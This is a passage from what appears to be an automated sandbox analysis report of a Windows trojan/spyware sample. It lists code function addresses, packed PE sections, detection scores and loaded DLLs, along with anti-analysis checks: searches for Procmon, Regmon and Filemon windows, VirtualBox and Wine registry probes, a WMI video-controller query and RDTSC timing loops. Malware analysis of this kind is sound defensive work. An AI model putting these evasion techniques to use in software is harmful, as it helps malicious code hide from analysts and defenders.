            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B73C00_2_007B73C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF3C00_2_007EF3C0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DF34C0_2_008DF34C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008253400_2_00825340
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008113460_2_00811346
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C93550_2_008C9355
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085D4940_2_0085D494
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EF4500_2_007EF450
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B94CB0_2_008B94CB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008194C40_2_008194C4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008714CF0_2_008714CF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008574F50_2_008574F5
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008174110_2_00817411
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008114190_2_00811419
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087941A0_2_0087941A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008694360_2_00869436
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082B4340_2_0082B434
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082D44B0_2_0082D44B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D74A50_2_007D74A5
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087745E0_2_0087745E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008954520_2_00895452
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089B46A0_2_0089B46A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082558E0_2_0082558E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C15A70_2_008C15A7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D95A60_2_008D95A6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008515B60_2_008515B6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CF5B30_2_008CF5B3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A35C80_2_008A35C8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C75C70_2_008C75C7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007CD5300_2_007CD530
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0097D5C40_2_0097D5C4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B55E20_2_008B55E2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E150E0_2_007E150E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081B5FF0_2_0081B5FF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008275100_2_00827510
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008135150_2_00813515
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D35190_2_008D3519
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089F51E0_2_0089F51E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085351C0_2_0085351C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086D51A0_2_0086D51A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C35200_2_008C3520
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009815370_2_00981537
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008555340_2_00855534
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083154F0_2_0083154F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082356D0_2_0082356D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008256980_2_00825698
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B76900_2_008B7690
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008936AE0_2_008936AE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008856A40_2_008856A4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008496BE0_2_008496BE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DD6B70_2_008DD6B7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008276BC0_2_008276BC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D36CE0_2_008D36CE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A96C60_2_008A96C6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082D6FF0_2_0082D6FF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083F6050_2_0083F605
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089D60F0_2_0089D60F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089B6070_2_0089B607
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DB6120_2_008DB612
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082F63D0_2_0082F63D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083D6590_2_0083D659
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BF66E0_2_008BF66E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084B66B0_2_0084B66B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008336770_2_00833677
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009876600_2_00987660
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AF6770_2_008AF677
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008357920_2_00835792
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082579D0_2_0082579D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_009917B40_2_009917B4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008997CB0_2_008997CB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008957D10_2_008957D1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087F7DB0_2_0087F7DB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086D7E00_2_0086D7E0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008857F80_2_008857F8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008737F00_2_008737F0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008377140_2_00837714
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082971F0_2_0082971F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008617250_2_00861725
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D37D00_2_007D37D0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DF7BC0_2_007DF7BC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082B74A0_2_0082B74A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C975D0_2_008C975D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B97790_2_008B9779
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087D7730_2_0087D773
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AB7700_2_008AB770
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088D8890_2_0088D889
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084188C0_2_0084188C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DB89C0_2_008DB89C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008918970_2_00891897
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: String function: 007B7EE0 appears 44 times
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: String function: 007C4110 appears 83 times
            Source: x6VtGfW26X.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: x6VtGfW26X.exeStatic PE information: Section: ZLIB complexity 0.9999421772203947
            Source: x6VtGfW26X.exeStatic PE information: Section: yojtimdr ZLIB complexity 0.994666870701256
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E26E4 CoCreateInstance,0_2_007E26E4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: x6VtGfW26X.exe, 00000000.00000003.1726865836.00000000059A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: x6VtGfW26X.exeVirustotal: Detection: 58%
            Source: x6VtGfW26X.exeReversingLabs: Detection: 65%
            Source: x6VtGfW26X.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile read: C:\Users\user\Desktop\x6VtGfW26X.exeJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: x6VtGfW26X.exeStatic file information: File size 1883648 > 1048576
            Source: x6VtGfW26X.exeStatic PE information: Raw size of yojtimdr is bigger than: 0x100000 < 0x1a2000

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeUnpacked PE file: 0.2.x6VtGfW26X.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yojtimdr:EW;yoycphiu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yojtimdr:EW;yoycphiu:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: x6VtGfW26X.exeStatic PE information: real checksum: 0x1d8db2 should be: 0x1d745f
            Source: x6VtGfW26X.exeStatic PE information: section name:
            Source: x6VtGfW26X.exeStatic PE information: section name: .idata
            Source: x6VtGfW26X.exeStatic PE information: section name:
            Source: x6VtGfW26X.exeStatic PE information: section name: yojtimdr
            Source: x6VtGfW26X.exeStatic PE information: section name: yoycphiu
            Source: x6VtGfW26X.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008097C5 push 62EDCC08h; mov dword ptr [esp], ebp0_2_00809DBD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00809E5E push 1373E58Bh; mov dword ptr [esp], esi0_2_0080A0BF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00809E5E push edi; mov dword ptr [esp], eax0_2_0080A0C3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080C084 push 3FF8BC2Bh; mov dword ptr [esp], edi0_2_0080E562
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008080A2 push eax; mov dword ptr [esp], ebp0_2_008080C4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080C0E6 push ebx; mov dword ptr [esp], esi0_2_0080CA22
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080801B push edx; mov dword ptr [esp], ebp0_2_008096F0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080801B push 62EDCC08h; mov dword ptr [esp], ebp0_2_00809DBD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080E022 push ebx; mov dword ptr [esp], 77B6151Fh0_2_0080E025
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080E022 push 6FD82661h; mov dword ptr [esp], esi0_2_0080E039
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080804B push edi; mov dword ptr [esp], ebx0_2_00808195
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080C059 push 773B48C2h; mov dword ptr [esp], edi0_2_0080D498
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0080C059 push eax; mov dword ptr [esp], 1F2D2FC7h0_2_0080D4A3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008221A2 push edx; mov dword ptr [esp], 62F0D63Ah0_2_008225EF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008221A2 push edi; mov dword ptr [esp], eax0_2_00822604
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008221A2 push esi; mov dword ptr [esp], edx0_2_008226E0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008681AE push 4B974C83h; mov dword ptr [esp], esp0_2_0086867C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008681AE push 3CE376FCh; mov dword ptr [esp], esi0_2_00868765
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008681AE push eax; mov dword ptr [esp], 4FEFFF69h0_2_00868833
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008681AE push 481447D1h; mov dword ptr [esp], esi0_2_008688CD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008101A8 push 0C6F1046h; mov dword ptr [esp], ecx0_2_008101BA
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00A5C188 push 062653DBh; mov dword ptr [esp], edi0_2_00A5C235
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00A5C188 push 68AC788Dh; mov dword ptr [esp], ebx0_2_00A5C255
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00A2E1F4 push 44E3E9D3h; mov dword ptr [esp], esi0_2_00A2E227
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E3 push 704AEB1Ah; mov dword ptr [esp], ecx0_2_0086C57D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E3 push edi; mov dword ptr [esp], eax0_2_0086C586
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E3 push esi; mov dword ptr [esp], edx0_2_0086C592
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E3 push esi; mov dword ptr [esp], esp0_2_0086C645
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E3 push ebx; mov dword ptr [esp], eax0_2_0086C673
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E3 push eax; mov dword ptr [esp], 6DB23632h0_2_0086C6CF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E3 push ecx; mov dword ptr [esp], ebp0_2_0086C778
            Source: x6VtGfW26X.exeStatic PE information: section name: entropy: 7.982000691785383
            Source: x6VtGfW26X.exeStatic PE information: section name: yojtimdr entropy: 7.953909419587561

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 997417 second address: 99741D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9968BB second address: 9968C7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6C4EBA07Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9968C7 second address: 9968F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jnc 00007FA6C4CAD506h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007FA6C4CAD514h 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9968F5 second address: 9968FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA6C4EBA076h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9968FF second address: 99691B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD518h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 996D43 second address: 996D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 ja 00007FA6C4EBA07Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 996D52 second address: 996D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 996D56 second address: 996D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA6C4EBA07Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998618 second address: 998622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA6C4CAD506h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998622 second address: 998626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998626 second address: 998675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FA6C4CAD50Ah 0x00000010 jmp 00007FA6C4CAD50Bh 0x00000015 popad 0x00000016 jmp 00007FA6C4CAD510h 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007FA6C4CAD511h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998675 second address: 99868F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA086h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 99868F second address: 998699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA6C4CAD506h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998699 second address: 99869D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 99869D second address: 9986F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FA6C4CAD519h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov cl, 8Ch 0x0000001a push 00000003h 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D2D65h], edi 0x00000023 clc 0x00000024 popad 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D17EAh], edx 0x0000002d push 00000003h 0x0000002f call 00007FA6C4CAD509h 0x00000034 jnl 00007FA6C4CAD514h 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9986F2 second address: 9986F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9986F8 second address: 998710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007FA6C4CAD50Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998710 second address: 998714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 998714 second address: 99875E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b js 00007FA6C4CAD511h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FA6C4CAD510h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA6C4CAD514h 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 99875E second address: 998762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
